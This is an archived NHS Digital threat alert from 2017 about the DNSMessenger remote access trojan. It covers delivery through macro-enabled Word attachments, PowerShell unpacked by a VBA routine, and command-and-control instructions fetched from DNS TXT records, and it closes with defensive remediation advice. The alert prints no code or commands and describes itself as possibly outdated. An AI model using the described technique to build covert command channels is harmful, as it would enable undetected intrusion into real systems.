Skip to main content

DNSMessenger - C2 Commands via DNS TXT record

A new Remote Access Trojan (RAT) has been discovered that downloads PowerShell commands stored inside a domain’s DNS TXT record. This makes it difficult to defend against, as DNS is required to resolve IP addresses to domain names.
Threat ID:
CC-1244
Category:
Trojan
Threat Severity:
Medium
Threat Vector:
Published:
8 March 2017 12:00 AM
Report a cyber attack: call 0300 303 5222 or email [email protected]

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk

Summary

A new Remote Access Trojan (RAT) has been discovered that downloads PowerShell commands stored inside a domain’s DNS TXT record. This makes it difficult to defend against, as DNS is required to resolve IP addresses to domain names.

Affected platforms

The following platforms are known to be affected:

Microsoft Windows

Windows all versions

Threat details

The use of the DNS TXT record for Command and Control (C2) communications is not new, but it is an uncommon method for Remote Access Trojans.

The malware is being delivered via spam emails in an attached macro-enabled word document which purports to be secured by McAfee.

If the victim opened the document and activated the content, a VBA script uses the Document_Open() function to unpack a PowerShell script and execute it. The unpacked script contains instructions that are used to maintain persistence and other operations. The malware would then contact a domain and extract the DNS TXT record which contains a Base64 encoded PowerShell command that loads components into memory.

In the initial analysis of the malware, it was found that there was a Base64 encoded string ‘SourceFireSux’. Source Fire is a Cisco owned company that offers IDS/IPS and next generation firewall services which are designed to protect organisations from DNS and web based threats.

DNSMessenger never writes any malicious code to disk, making detection more difficult.

All of the C2 domains used the following Top Level Domains (TLD); .me, .pw, .club, .us, .site, .com, .top, and .info. All of the domains consisted of either 4 or 5

random characters. At the time of writing, the domains were no longer active and the malware will be using new unknown Command and Control (C2) Servers.

Remediation steps

Type Step
  • Never open email attachments from untrusted sources.
  • Ensure that macros are disabled by default for files from untrusted sources.
  • Make sure that malware detections are kept up-to-date.
  • Monitor DNS for suspicious activity.
  • Make sure cyber-awareness training is kept up-to-date.

Last edited: 17 February 2020 11:29 am